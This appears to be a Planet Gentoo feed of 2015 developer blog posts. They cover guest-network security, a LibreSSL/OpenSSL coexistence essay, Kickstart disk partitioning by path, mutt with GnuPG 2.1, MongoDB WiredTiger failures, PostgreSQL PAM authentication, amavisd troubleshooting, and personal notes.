My usual setup involves flashing a router/accesspoint with dd-wrt (a linux based firmware). This allows setting up guest networks / virtual wireless interfaces (although not all devices will allow anything but public / WEP encryption, i.e. no WPA on the virtual interfaces, as these are by definition low security zones, this is however fine). The most important thing is that the guest network is

  • AP isolated, i.e does not allow traffic between individual devices on the network
  • only allows traffic through NAT to wan (internet), i.e. not LAN devices
  • QoS is enabled as to not interfere with your normal use

The guest network should further be restrictive in what traffic it allows, normally your visitors only require HTTP(s), POP3s, IMAPs, SMTPs, SSH (people shouldn’t use non-encrypted transport channels for reading mail so the non-secured alternatives are blocked), and maybe a few other protocols, so the firewall should ensure to be restrictive as a starting point.

A proper network setup remove the primary issues discussed with children’s devices being connected to network, its not any better allowing other unsecured devices onto it, so why don’t you do it properly in the first place?

In fact, with todays growth of the Internet of things, you will also want a dedicated device-network that is internal (no AP-isolation, but doesn’t allow traffic to lan or wan) for TV communication with speakers etc. I simply don’t get people plugging this directly into the regular network. That only leads to situations such as Samsung voice-recording / surveillance everything you say.

Disk encryption
Disk encryption is necessary in order to avoid passing through the security schemes using known passwords mentioned in the article. I remember in the good old days when NTFS first got here, and how easy it was to brute-force SAN files. Without disk encryption, separating profiles (e.g. in windows 7) won’t help you as anyone can boot a live OS (Linux ftw) giving access to all files, including configuration files. But quite frankly, multi-user systems are difficult to secure, hardware today is cheap, you shouldn’t let your kids use your own hardware in the first place, but set up own systems for them.

Seven proxies
Be restrictive in what kind of data you allow to flow through your network. Use Proxies, proxies, and even more proxies, filter all network access appropriately through firewalls, and more importantly, make frequent use of jump servers / gateways.

If you are worried about certain types of virus intrusion, also get a firewall device supporting intrusion detection/prevention systems and an appropriate license to keep this updated. If you are concerned about your childrens internet use, all web traffic should also be forced through a proxy (such as squid) on the firewall level.

Separate core devices of the network and don’t allow traffic into it even on the regular LAN without going through a jump server / gateway, e.g. using OpenVPN. I actually use this myself, for instance even though I connect my laptop to the regular wifi network, I won’t get access to my Virtual Machines without being logged into the VPN. Only certain specified services are exposed by default.

Cloud services
Cloud services are great, I mean, truly, with the number of devices we have today, how else can we keep data available for our own use? The one caveat, you really, truly, REALLY, MUST run the cloud service yourself. ownCloud is a great application, that have multiple clients across operating systems and platforms for this use. File storage, calendar, contact information and a good news reader. Not much more to ask for, and if there is, there is likely already an app for it.

Don’t ever allow friends or family to use iCloud, DropBox, google drive or whatnot. Of course, promote using these services to your enemies, you might want to get access to their data some day.

Nirbheek Chauhan a.k.a. nirbheek (homepage, bugs)

आो मीलो (clap clap clap)
शीलम शालो (clap clap clap)
कच्चा धागा (clap clap clap)
रेस लगा लो (clap clap clap)

(जलदी से)

आो मीलो शीलम शालो कच्चा धागा रेस लगा लो

दस पत्ते तोड़े
एक पत्ता कच्चा
हिरन का बच्चा
हिरन गया पानी में
पकड़ा उस्की नानी ने
नानी गयी लंडन
वहां से लाइ कंगन

कंगन गया टूट (clap)
नानी गयी रूठ (clap)

(और भी तेज़ी से)

नानी को मनाएंगे
रस मालाइ खाएंगे
रस मालाइ अच्छी
हमने खाइ मच्छी
मच्छी में निकला कांटा
मम्मी ने मारा चांटा
चांटा लगा ज़ोर से
हमने खाए समोसे
समोसे बढे अच्छे

नानाजी नमसते!

June 11, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)
The Parker Fund (June 11, 2015, 02:48 UTC)

Hello all,

I don’t usually post very personal things here on The Z-Issue, but rather use it for 1) posting information that may be of interest to others (e.g. solving technical problems [especially with regard to the world of Linux Engineering]), 2) mentioning articles that I found helpful, amusing, or otherwise interesting, or 3) just babbling about who knows what. This article, though, is about something that is very special to me, and one that is intimately and inextricably tied to who I am as a person.

For those of you who have read the about me page, you know that I have devoted the majority of my academic life to studies of Child and Adolescent Development / Psychology and Education. Understanding and helping children work through their difficult times is one of my biggest passions in this life.

Over the past decade or so, I’ve given a lot of thought to having children of my own and have decided that I would rather adopt than have kids who are biologically mine. My rationale is multifaceted, but primarily, I just think that there are enough children already here that could use loving homes, and I would like to offer that to one of them instead of bringing another one into the world. So, for several years now, I’ve been trying to put any little bit of extra money that I have into savings for adopting a child. In the past year, I have started to pursue adoption more actively from a lot of angles (discussing it with attorneys, researching adoption agencies and policies, et cetera). I have also tried to squirrel away even more money by doing side jobs and such. Though I’ve been relatively successful at saving money for the adoption, I have a very long way to go based on the estimate that I have been given (approximately $85,000 USD). At the time of this writing, I have saved a mere ~17% of the funds that I will need in order to get started on the process.

Why bring up any of these things about my personal life and goals? Simply put, the idea of crowdfunding is enticing in this situation. I post my articles hoping that they will help people who find themselves in similar situations (as mentioned, particularly relating to Linux, but also to travels, and so on) as the ones in which I have found myself over the years. And, thankfully, according to the analytics for the site and comments on various posts, people are finding the articles helpful. In particular, a couple of my Linux articles have been viewed tens of thousands of times on certain days. I’ll cut to the chase: if any of my articles have been helpful to you, please consider donating ANY amount that you comfortably can to The Parker Fund–helping me reach my goal of being able to adopt. Absolutely every dollar helps, so any donation will be greatly appreciated!

Why “The Parker Fund?” As I’ve said, I have more actively started to pursue the adoption within the past year or so. I’ve pondered many different aspects of the process, and have decided that I would like to adopt a boy first. I have also chosen the name Parker, and so to keep the goal alive and real in my mind, I refer to him by name, though he may not have even been born yet. Again, to keep my motivation up through setback after setback, I have started to decorate a room for him:


Parker's room
Click to enlarge

These types of little things help keep me focused on my goal, even if they seem a little premature.

So, in effort to expedite the start of the adoption process, if you can spare any funds and would like to help me, you may contribute to The Parker Fund by using the PayPal “Donate” button in the top widget on the right-hand side of the page. As I said, every dollar helps and will be greatly appreciated! Even if you can’t or don’t want to contribute, thank you for reading the Z-Issue and taking time out of your day to read about a personal aspiration that is very near and dear to my heart.

Cheers,
Zach

June 10, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Live SELinux userspace ebuilds (June 10, 2015, 18:07 UTC)

In between courses, I pushed out live ebuilds for the SELinux userspace applications: libselinux, policycoreutils, libsemanage, libsepol, sepolgen, checkpolicy and secilc. These live ebuilds (with Gentoo version 9999) pull in the current development code of the SELinux userspace so that developers and contributors can already work with in-progress code developments as well as see how they work on a Gentoo platform.

That being said, I do not recommend using the live ebuilds for anyone else except developers and contributors in development zones (definitely not on production). One of the reasons is that the ebuilds do not apply Gentoo-specific patches to the ebuilds. I would also like to remove the Gentoo-specific manipulations that we do, such as small Makefile adjustments, but let’s start with just ignoring the Gentoo patches.

Dropping the patches makes sure that we track upstream libraries and userspace closely, and allows developers to try and send out patches to the SELinux project to fix Gentoo related build problems. But as not all packages can be deployed successfully on a Gentoo system some patches need to be applied anyway. For this, users can drop the necessary patches inside /etc/portage/patches as all userspace ebuilds use the epatch_user method.

Finally, observant users will notice that “secilc” is also provided. This is a new package, which is probably going to have an official release with a new userspace release. It allows for building CIL-based SELinux policy code, and was one of the drivers for me to create the live ebuilds as I’m experimenting with the CIL constructions. So expect more on that later.

June 07, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)
gentoo.de relaunched (June 07, 2015, 23:02 UTC)

Hi!

Two months ago, the gentoo.org website redesign was announced. For a few hours now, gentoo.de is following. The similarities in look are not by coincidence: Both design were done by Alex Legler.

The new website is based on Jekyll rather than GuideXML previously. Any bugs you find on the website can be reported on GitHub where the website sources are hosted.

I would like to take the opportunity to thank both Manitu and SysEleven for providing the hardware running gentoo.de (and other Gentoo e.V. services) free of charge. Very kind!

Best, Sebastian

June 06, 2015
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
LibreSSL, OpenSSL, collisions and problems (June 06, 2015, 12:33 UTC)

Some time ago, on the gentoo-dev mailing list, there has been an interesting thread on the state of LibreSSL in Gentoo. In particular I repeated some of my previous concerns about ABI and API compatibility, especially when trying to keep both libraries on the same system.

While I hope that the problems I pointed out are well clear to the LibreSSL developers, I thought reiterating them again clearly in a blog post would give them a wider reach and thus hope that they can be addressed. Please feel free to reshare in response to people hand waving the idea that LibreSSL can be either a drop-in, or stand-aside replacement for OpenSSL.

Last year, when I first blogged about LibreSSL, I had to write a further clarification as my post was used to imply that you could just replace the OpenSSL binaries with LibreSSL and be done with it. This is not the case and I won't even go back there. What I'm concerned about this time is whether you can install the two in the same system, and somehow decide which one you want to use on a per-package basis.

Let's start with the first question: why would you want to do that? Everybody at this point knows that LibreSSL was forked from the OpenSSL code and started removing code that has been needed unnecessary or even dangerous – a very positive thing, given the amount of compatibility kludges around OpenSSL! – and as such it was a subset of the same interface as its parent, thus there would be no reason to wanting the two libraries on the same system.

But then again, LibreSSL never meant to be considered a drop-in replacement, so they haven't cared as much for the evolution of OpenSSL, and just proceeded in their own direction; said direction included building a new library, libtls, that implements higher-level abstractions of TLS protocol. This vaguely matches the way NSS (the Netscape-now-Mozilla TLS library) is designed, and I think it makes sense: it reduces the amount of repetition that needs to be coded in multiple parts of the software stack to implement HTTPS for instance, reducing the chance of one of them making a stupid mistake.

Unfortunately, this library was originally tied firmly to LibreSSL and there was no way for it to be usable with OpenSSL — I think this has changed recently as a "portable" build of libtls should be available. Ironically, this wouldn't have been a problem at all if it wasn't that LibreSSL is not a superset of OpenSSL, as this is where the core of the issue lies.

By far, this is not the first time a problem like this happens in Open Source software communities: different people will want to implement the same concept in different ways. I like to describe this as software biodiversity and I find it generally a good thing. Having more people looking at the same concept from different angles can improve things substantially, especially in regard to finding safe implementations of network protocols.

But there is a problem when you apply parallel evolution to software: if you fork a project and then evolve it on your own agenda, but keep the same library names and a mostly compatible (thus conflicting) API/ABI, you're going to make people suffer, whether they are developers, consumers, packagers or users.

LibreSSL, libav, Ghostscript, ... there are plenty of examples. Since the features of the projects, their API and most definitely their ABIs are not the same, when you're building a project on top of any of these (or their originators), you'll end up at some point making a conscious decision on which one you want to rely on. Sometimes you can do that based only on your technical needs, but in most cases you end up with a compromise based on technical needs, licensing concerns and availability in the ecosystem.

These projects didn't change the name of their libraries, that way they can be used as drop-rebuild replacement for consumers that keep to the greatest common divisor of the interface, but that also means you can't easily install two of them in the same system. And since most distributions, with the exception of Gentoo, would not really provide the users with choice of multiple implementations, you end up with either a fractured ecosystem, or one that is very much non-diverse.

So if all distributions decide to standardize on one implementation, that's what the developers will write for. And this is why OpenSSL will likely to stay the standard for a long while still. Of course in this case it's not as bad as the situation with libav/ffmpeg, as the base featureset is going to be more or less the same, and the APIs that have been dropped up to now, such as the entropy-gathering daemon interface, have been considered A Bad Idea™ for a while, so there are not going to be OpenSSL-only source projects in the future.

What becomes an issue here is that software is built against OpenSSL right now, and you can't really change this easily. I've been told before that this is not true, because OpenBSD switched, but there is a huge difference between all of the BSDs and your usual Linux distributions: the former have much more control on what they have to support.

In particular, the whole base system is released in a single scoop, and it generally includes all the binary packages you can possibly install. Very few third party software providers release binary packages for OpenBSD, and not many more do for NetBSD or FreeBSD. So as long as you either use the binaries provided by those projects or those built by you on the same system, switching the provider is fairly easy.

When you have to support third-party binaries, then you have a big problem, because a given binary may be built against one provider, but depend on a library that depends on the other. So unless you have full control of your system, with no binary packages at all, you're going to have to provide the most likely provider — which right now is OpenSSL, for good or bad.

Gentoo Linux is, once again, in a more favourable position than many others. As long as you have a full source stack, you can easily choose your provider without considering its popularity. I have built similar stacks before, and my servers deploy stacks similarly, although I have not tried using LibreSSL for any of them yet. But on the desktop it might be trickier, especially if you want to do things like playing Steam games.

But here's the harsh reality, even if you were to install the libraries in different directories, and you would provide a USE flag to choose between the two, it is not going to be easy to apply the right constraints between final executables and libraries all the way into the tree.

I'm not sure if I have an answer to balance the ability to just make the old software use the new library and the side-installation. I'm scared that a "solution" that can be found to solve this problem is bundling and you can probably figure out that doing so for software like OpenSSL or LibreSSL is a terrible idea, given how fast you should update in response to a security vulnerability.

June 05, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)

Important!

This article is one of the most-viewed on The Z-Issue, and is sometimes read thousands of times per day. If it has helped you, please consider a small donation to The Parker Fund by using the top widget at the right. Thanks!

So, for several weeks now, I’ve been struggling with disk naming and UDEV as they relate to RHEL or CentOS Kickstart automation via PXE. Basically, what used to be a relatively straight-forward process of setting up partitions based on disk name (e.g. /dev/sda for the primary disk, /dev/sdb for the secondary disk, and so on) has become a little more complicated due to the order in which the kernel may identify disks with UDEV implementations. The originally-used naming conventions of /dev/sdX may no longer be consistent across reboots or across machines. How this problem came to my attention was when I was Kickstarting a bunch of hosts, and realised that several of them were indicating that there wasn’t enough space on the drives that I had referenced. After doing some digging, I realised that some servers were identifying KVM-based media (like via a Cisco UCS CIMC interface), or other USB media as primary disks instead of the actual primary SCSI-based disks (SATA or SAS drives).

Though I agree that identifying disks by their path, their UUID, or an otherwise more permanent name is preferred to the ambiguous /dev/sdX naming scheme, it did cause a problem, and one that didn’t have a readily-identifiable workaround for my situation. My first thought was to use UUID, or gather the disk ID from /dev/disk/by-id/. However, that wouldn’t work because it wouldn’t be the same across all servers, so automatic installations via PXE wouldn’t be feasible. Next, I looked at referencing disks by their PCI location, which can be found within /dev/disk/by-path/. Unfortunately, I found that the PCI location might vary between servers as well. For example, I found:

Server 1:
/dev/disk/by-path/pci-0000:82:00.0-scsi-0:2:0:0 –> primary SCSI disk
/dev/disk/by-path/pci-0000:82:00.0-scsi-0:2:0:0 –> secondary SCSI disk

Server 2:
/dev/disk/by-path/pci-0000:0b:00.0-scsi-0:2:0:0 –> primary SCSI disk
/dev/disk/by-path/pci-0000:0b:00.0-scsi-0:2:0:0 –> secondary SCSI disk

That being said, I did notice one commonality between the servers that I used for testing. The primary and secondary disks (which, by the way, are RAID arrays attached to the same controller) all ended with ‘scsi-0:2:0:0 ‘ for the primary disk, and ‘scsi-0:2:1:0 ‘ for the secondary disk. Thinking that I could possibly just specify using a wildcard, I tried:

part /boot --fstype ext2 --size=100 --ondisk=disk/by-path/*scsi-0:2:0:0

but alas, that caused Anaconda to error out stating that the specified drive did not exist. At this point, I thought that all hope was lost in terms of automation. Then, however, I had a flash of genius (they don’t happen all that often). I could probably gather the full path ID in a pre-installation script, and then get the FULL path ID into the Kickstart configuration file with an include. Here are the code snippets that I wrote:


%pre --interpreter=/bin/bash
## Get the full by-path ID of the primary and secondary disks
osdisk=$(ls -lh /dev/disk/by-path/ | grep 'scsi-0:2:0:0 ' | awk '{print $9}')
datadisk=$(ls -lh /dev/disk/by-path/ | grep 'scsi-0:2:1:0 ' | awk '{print $9}')


## Create a temporary file with the partition scheme to be included in the KS config
echo "# Partitioning scheme" > /tmp/partition_layout
echo "clearpart --all" >> /tmp/partition_layout
echo "zerombr" >> /tmp/partition_layout
echo "part /boot --fstype ext2 --size=100 --ondisk=disk/by-path/$osdisk" >> /tmp/partition_layout
echo "part swap --recommended --ondisk=disk/by-path/$osdisk" >> /tmp/partition_layout
echo "part pv.01 --size=100 --grow --ondisk=disk/by-path/$osdisk" >> /tmp/partition_layout
echo "part pv.02 --size=100 --grow --ondisk=disk/by-path/$datadisk" >> /tmp/partition_layout
echo "volgroup vg_os pv.01" >> /tmp/partition_layout
echo "volgroup vg_data pv.02" >> /tmp/partition_layout
echo "logvol / --vgname=vg_os --size=100 --name=lv_os --fstype=ext4 --grow" >> /tmp/partition_layout
echo "logvol /data --vgname=vg_data --size=100 --name=lv_data --fstype=ext4 --grow" >> /tmp/partition_layout
echo "# Bootloader location" >> /tmp/partition_layout
echo "bootloader --location=mbr --driveorder=/dev/disk/by-path/$osdisk,/dev/disk/by-path/$datadisk --append=\"rhgb\"" >> /tmp/partition_layout
%end

Some notes about the pre-installation script would be: 1) yes, I know that it is a bit clumsy, but it functions despite the lack of elegance; 2) in lines 3 and 4, make sure that the grep statements include a final space. The final space (e.g. grep 'scsi-0:2:0:0 ' instead of just grep 'scsi-0:2:0:0') is important because the machine may have partitions already set up, and in that case, those partitions would be identified as '*scsi-0:2:0:0-part#' where # is the partition number.

So, this pre-installation script generates a file called /tmp/partition_layout that essentially has a normal partition scheme for a Kickstart configuration file, but references the primary and secondary SCSI disks (again, as RAID arrays attached to the same controller) by their full ‘by-path’ IDs. Then, the key is to include that file within the Kickstart configuration via:


# Partitioning scheme information gathered from pre-install script below
%include /tmp/partition_layout

I am happy to report that for the servers that I have tested thus far, this method works. Is it possible that there will be primary and secondary disks that are identified via different path IDs not caught by my pre-installation script? Yes, that is possible. It’s also possible that your situation will require a completely different pre-installation script to gather the unique identifier of your choice. That being said, I hope that this post will help you devise your method of reliably identifying disks so that you can create the partition scheme automatically via your Kickstart configuration file. That way, you can then deploy it to many servers via PXE (or any other implementation that you’re currently utilising for mass deployment).

Cheers,
Zach

Robin Johnson a.k.a. robbat2 (homepage, bugs)
gnupg-2.1 mutt (June 05, 2015, 17:25 UTC)

For the mutt users with GnuPG, depending on your configuration, you might notice that mutt's handling of GnuPG mail stopped working with GnuPG. There were a few specific cases that would have caused this, which I'll detail, but if you just want it to work again, put the below into your Muttrc, and make the tweak to gpg-agent.conf. The underlying cause for most if it is that secret key operations have moved to the agent, and many Mutt users used the agent-less mode, because Mutt handled the passphrase nicely on it's own.

  • -u must now come BEFORE --cleansign
  • Add allow-loopback-pinentry to gpg-agent.conf, and restart the agent
  • The below config adds --pinentry-mode loopback before --passphrase-fd 0, so that GnuPG (and the agent) will accept it from Mutt still.
  • --verbose is optional, depending what you're doing, you might find --no-verbose cleaner.
  • --trust-model always is a personal preference for my Mutt mail usage, because I do try and curate my keyring
set pgp_autosign = yes
set pgp_use_gpg_agent = no
set pgp_timeout = 600
set pgp_sign_as="(your key here)"
set pgp_ignore_subkeys = no

set pgp_decode_command="gpg %?p?--pinentry-mode loopback  --passphrase-fd 0? --verbose --no-auto-check-trustdb --batch --output - %f"
set pgp_verify_command="gpg --pinentry-mode loopback --verbose --batch --output - --no-auto-check-trustdb --verify %s %f"
set pgp_decrypt_command="gpg %?p?--pinentry-mode loopback --passphrase-fd 0? --verbose --batch --output - %f"
set pgp_sign_command="gpg %?p?--pinentry-mode loopback --passphrase-fd 0? --verbose --batch --output - --armor --textmode %?a?-u %a? --detach-sign %f"
set pgp_clearsign_command="gpg %?p?--pinentry-mode loopback --passphrase-fd 0? --verbose --batch --output - --armor --textmode %?a?-u %a? --detach-sign %f"
set pgp_encrypt_sign_command="pgpewrap gpg %?p?--pinentry-mode loopback --passphrase-fd 0? --verbose --batch --textmode --trust-model always --output - %?a?-u %a? --armor --encrypt --sign --armor -- -r %r -- %f"
set pgp_encrypt_only_command="pgpewrap gpg %?p?--pinentry-mode loopback --passphrase-fd 0? --verbose --batch --trust-model always --output --output - --encrypt --textmode --armor -- -r %r -- %f"
set pgp_import_command="gpg %?p?--pinentry-mode loopback --passphrase-fd 0? --verbose --import -v %f"
set pgp_export_command="gpg %?p?--pinentry-mode loopback --passphrase-fd 0? --verbose --export --armor %r"
set pgp_verify_key_command="gpg %?p?--pinentry-mode loopback --passphrase-fd 0? --verbose --batch --fingerprint --check-sigs %r"
set pgp_list_pubring_command="gpg %?p?--pinentry-mode loopback --passphrase-fd 0? --verbose --batch --with-colons --list-keys %r"
set pgp_list_secring_command="gpg %?p?--pinentry-mode loopback --passphrase-fd 0? --verbose --batch --with-colons --list-secret-keys %r"

This entry was originally posted at http://robbat2.dreamwidth.org/238770.html. Please comment there using OpenID.

May 26, 2015
Alexys Jacob a.k.a. ultrabug (homepage, bugs)

In my previous post regarding the migration of our production cluster to mongoDB 3.0 WiredTiger, we successfully upgraded all the secondaries of our replica-sets with decent performances and (almost, read on) no breakage.

Step 2 plan

The next step of our migration was to test our work load on WiredTiger primaries. After all, this is where the new engine would finally demonstrate all its capabilities.

  • We thus scheduled a step down from our 3.0 MMAPv1 primary servers so that our WiredTiger secondaries would take over.
  • Not migrating the primaries was a safety net in case something went wrong… And boy it went so wrong we’re glad we played it safe that way !
  • We rolled back after 10 minutes of utter bitterness.

The failure

After all the wait and expectation, I can’t express our level of disappointment at work when we saw that the WiredTiger engine could not handle our work load. Our application started immediately to throw 50 to 250 WriteConflict errors per minute !

Turns out that we are affected by this bug and that, of course, we’re not the only ones. So far it seems that it affects collections with :

  • heavy insert / update work loads
  • an unique index (or compound index)

The breakages

We also discovered that we’re affected by a weird mongodump new behaviour where the dumped BSON file does not contain the number of documents that mongodump said it was exporting. This is clearly a new problem because it happened right after all our secondaries switched to WiredTiger.

Since we have to ensure a strong consistency of our exports and that the mongoDB guys don’t seem so keen on moving on the bug (which I surely can understand) there is a large possibility that we’ll have to roll back even the WiredTiger secondaries altogether.

Not to mention that since the 3.0 version, we experience some CPU overloads crashing the entire server on our MMAPv1 primaries that we’re still trying to tackle before opening another JIRA bug…

Sad panda

Of course, any new major release such as 3.0 causes its headaches and brings its lot of bugs. We were ready for this hence the safety steps we took to ensure that we could roll back on any problem.

But as a long time advocate of mongoDB I must admit my frustration, even more after the time it took to get this 3.0 out and all the expectations that came with it.

I hope I can share some better news on the next blog post.

May 25, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)

I have been running a PostgreSQL cluster for a while as the primary backend for many services. The database system is very robust, well supported by the community and very powerful. In this post, I’m going to show how I use central authentication and authorization with PostgreSQL.

Centralized management is an important principle whenever deployments become very dispersed. For authentication and authorization, having a high-available LDAP is one of the more powerful components in any architecture. It isn’t the only method though – it is also possible to use a distributed approach where the master data is centrally managed, but the proper data is distributed to the various systems that need it. Such a distributed approach allows for high availability without the need for a highly available central infrastructure (user ids, group membership and passwords are distributed to the servers rather than queried centrally). Here, I’m going to focus on a mixture of both methods: central authentication for password verification, and distributed authorization.

PostgreSQL default uses in-database credentials

By default, PostgreSQL uses in-database credentials for the authentication and authorization. When a CREATE ROLE (or CREATE USER) command is issued with a password, it is stored in the pg_catalog.pg_authid table:

postgres# select rolname, rolpassword from pg_catalog.pg_authid;
    rolname     |             rolpassword             
----------------+-------------------------------------
 postgres_admin | 
 dmvsl          | 
 johan          | 
 hdc_owner      | 
 hdc_reader     | 
 hdc_readwrite  | 
 hadoop         | 
 swift          | 
 sean           | 
 hdpreport      | 
 postgres       | md5c127bc9fc185daf0e06e785876e38484

Authorizations are also stored in the database (and unless I’m mistaken, this cannot be moved outside):

postgres# \l db_hadoop
                                   List of databases
   Name    |   Owner   | Encoding |  Collate   |   Ctype    |     Access privileges     
-----------+-----------+----------+------------+------------+---------------------------
 db_hadoop | hdc_owner | UTF8     | en_US.utf8 | en_US.utf8 | hdc_owner=CTc/hdc_owner  +
           |           |          |            |            | hdc_reader=c/hdc_owner   +
           |           |          |            |            | hdc_readwrite=c/hdc_owner

Furthermore, PostgreSQL has some additional access controls through its pg_hba.conf file, in which the access towards the PostgreSQL service itself can be governed based on context information (such as originating IP address, target database, etc.).

For more information about the standard setups for PostgreSQL, definitely go through the official PostgreSQL documentation as it is well documented and kept up-to-date.

Now, for central management, in-database settings become more difficult to handle.

Using PAM for authentication

The first step to move the management of authentication and authorization outside the database is to look at a way to authenticate users (password verification) outside the database. I tend not to use a distributed password approach (where a central component is responsible for changing passwords on multiple targets), instead relying on a high-available LDAP setup, but with local caching (to catch short-lived network hick-ups) and local password use for last-hope accounts (such as root and admin accounts).

PostgreSQL can be configured to directly interact with an LDAP, but I like to use Linux PAM whenever I can. For my systems, it is a standard way of managing the authentication of many services, so the same goes for PostgreSQL. And with the sys-auth/pam_ldap package integrating multiple services with LDAP is a breeze. So the first step is to have PostgreSQL use PAM for authentication. This is handled through its pg_hba.conf file:

# TYPE  DATABASE        USER    ADDRESS         METHOD          [OPTIONS]
local   all             all                     md5
host    all             all     all             pam             pamservice=postgresql

This will have PostgreSQL use the postgresql PAM service for authentication. The PAM configuration is thus in /etc/pam.d/postgresql. In it, we can either directly use the LDAP PAM modules, or use the SSSD modules and have SSSD work with LDAP.

Yet, this isn’t sufficient. We still need to tell PostgreSQL which users can be authenticated – the users need to be defined in the database (just without password credentials because that is handled externally now). This is done together with the authorization handling.

Users and group membership

Every service on the systems I maintain has dedicated groups in which for instance its administrators are listed. For instance, for the PostgreSQL services:

# getent group gpgsqladmin
gpgsqladmin:x:413843:swift,dmvsl

A local batch job (ran through cron) queries this group (which I call the masterlist, as well as queries which users in PostgreSQL are assigned the postgres_admin role (which is a superuser role like postgres and is used as the intermediate role to assign to administrators of a PostgreSQL service), known as the slavelist. Delta’s are then used to add the user or remove it.

# Note: membersToAdd / membersToRemove / _psql are custom functions
#       so do not vainly search for them on your system ;-)
for member in $(membersToAdd ${masterlist} ${slavelist}) ; do
  _psql "CREATE USER ${member} LOGIN INHERIT;" postgres
  _psql "GRANT postgres_admin TO ${member};" postgres
done

for member in $(membersToRemove ${masterlist} ${slavelist}) ; do
  _psql "REVOKE postgres_admin FROM ${member};" postgres
  _psql "DROP USER ${member};" postgres
done

The postgres_admin role is created whenever I create a PostgreSQL instance. Likewise, for databases, a number of roles are added as well. For instance, for the db_hadoop database, the hdc_owner, hdc_reader and hdc_readwrite roles are created with the right set of privileges. Users are then granted this role if they belong to the right group in the LDAP. For instance:

# getent group gpgsqlhdc_own
gpgsqlhdc_own:x:413850:hadoop,johan,christov,sean

With this simple approach, granting users access to a database is a matter of adding the user to the right group (like gpgsqlhdc_ro for read-only access to the Hadoop related database(s)) and either wait for the cron-job to add it, or manually run the authorization synchronization. By standardizing on infrastructural roles (admin, auditor) and data roles (owner, rw, ro) managing multiple databases is a breeze.

May 23, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)

Hallo!

Die Troisdorfer Linux User Group (kurz TroLUG) veranstaltet

am Samstag den 01.08.2015
in Troisdorf nahe Köln/Bonn

einen Gentoo-Workshop, der sich an fortgeschrittene User richtet.

Mehr Details, die genaue Adresse und der Ablauf finden sich auf der entsprechenden Seite der TroLUG.

Grüße,

 

Sebastian

Alexys Jacob a.k.a. ultrabug (homepage, bugs)

Good news for gevent users blocked on python < 2.7.9 due to broken SSL support since python upstream dropped the private API _ssl.sslwrap that eventlet was using.

This issue was starting to get old and problematic since GLSA 2015-0310 but I’m happy to say that almost 6 hours after the gevent-1.0.2 release, it is already available on portage !

We were also affected by this issue at work so I’m glad that the tension between ops and devs this issue was causing will finally be over ;)

May 22, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)
Three new quotes to the database (May 22, 2015, 18:19 UTC)

Today I added three new quotes to the “My Favourite Quotes” database that you see on the right-hand side of my blog.

“The evil people of the world would have little impact without the sheep.”
–Tim Clark

“Apologising does not always mean that you’re wrong and the other person is right. It just means that you value your relationship more than your ego.”
–Unknown

“Some day soon, perhaps in forty years, there will be no one alive who has ever known me. That’s when I will be truly dead – when I exist in no one’s memory. I thought a lot about how someone very old is the last living individual to have known some person or cluster of people. When that person dies, the whole cluster dies,too, vanishes from the living memory. I wonder who that person will be for me. Whose death will make me truly dead?”
–Irvin D. Yalom in Love’s Executioner and Other Tales of Psychotherapy

The first one came up during a conversation that I was having with a colleague who is absolutely brilliant. That quote in particular sums up a very simplistic idea, but one that would have a dramatic impact on human existence if we were to recognise our sometimes blind following of others.

Cheers,
Zach

May 20, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)

Important!

My tech articles—especially Linux ones—are some of the most-viewed on The Z-Issue. If this one has helped you, please consider a small donation to The Parker Fund by using the top widget at the right. Thanks!

Late last night, I decided to apply some needed updates to my personal mail server, which is running Gentoo Linux (OpenRC) with a mail stack of Postfix & Dovecot with AMaViS (filtering based on SpamAssassin, ClamAV, and Vipul’s Razor). After applying the updates, and restarting the necessary components of the mail stack, I ran my usual test of sending an email from one of my accounts to another one. It went through without a problem.

However, I realised that it isn’t a completely valid test to send an email from one internal account to another because I have amavisd configured to not scan anything coming from my trusted IPs and domains. I noticed several hundred mails in the queue when I ran postqueue -p, and they all had notices similar to:


status=deferred (delivery temporarily suspended:
connect to 127.0.0.1[127.0.0.1]:10024: Connection refused)

That indicated to me that it wasn’t a problem with Postfix (and I knew it wasn’t a problem with Dovecot, because I could connect to my accounts via IMAP). Seeing as amavisd is running on localhost:10024, I figured that that is where the problem had to be. A lot of times, when there is a “connection refused” notification, it is because no service is listening on that port. You can test to see what ports are in a listening state and what processes, applications, or daemons are listening by running:

netstat -tupan | grep LISTEN

When I did that, I noticed that amavisd wasn’t listening on port 10024, which made me think that it wasn’t running at all. That’s when I ran into the strange part of the problem: the init script output:

# /etc/init.d/amavisd start
* WARNING: amavisd has already been started
# /etc/init.d/amavisd stop
The amavisd daemon is not running                [ !! ]
* ERROR: amavisd failed to start

So, apparently it is running and not running at the same time (sounds like a Linux version of Schrödinger’s cat to me)! It was obvious, though, that it wasn’t actually running (which could be verified with ‘ps -elf | grep -i amavis’). So, what to do? I tried manually removing the PID file, but that actually just made matters a bit worse. Ultimately, this combination is what fixed the problem for me:


sa-update
/etc/init.d/amavisd zap
/etc/init.d/amavisd start

It seems that the SpamAssassin rules file had gone missing, and that was causing amavisd to not start properly. Manually updating the rules file (with ‘sa-update’) regenerated it, and then I zapped amavisd completely, and lastly restarted the daemon.

Hope that helps anyone running into the same problem.

Cheers,
Zach

EDIT: I have included a new post about debugging amavisd start-up problems.

Arun Raghavan a.k.a. ford_prefect (homepage, bugs)
GNOME Asia 2015 (May 20, 2015, 08:08 UTC)

I was in Depok, Indonesia last week to speak at GNOME Asia 2015. It was a great experience — the organisers did a fantastic job and as a bonus, the venue was incredibly pretty!

View from our room

View from our room

My talk was about the GNOME audio stack, and my original intention was to talk a bit about the APIs, how to use them, and how to choose which to use. After the first day, though, I felt like a more high-level view of the pieces would be more useful to the audience, so I adjusted the focus a bit. My slides are up here.

Nirbheek and I then spent a couple of days going down to Yogyakarta to cycle around, visit some temples, and sip some fine hipster coffee.

All in all, it was a week well spent. I’d like to thank the GNOME Foundation for helping me get to the conference!

Sponsored by GNOME!

Sponsored by GNOME!

May 19, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)

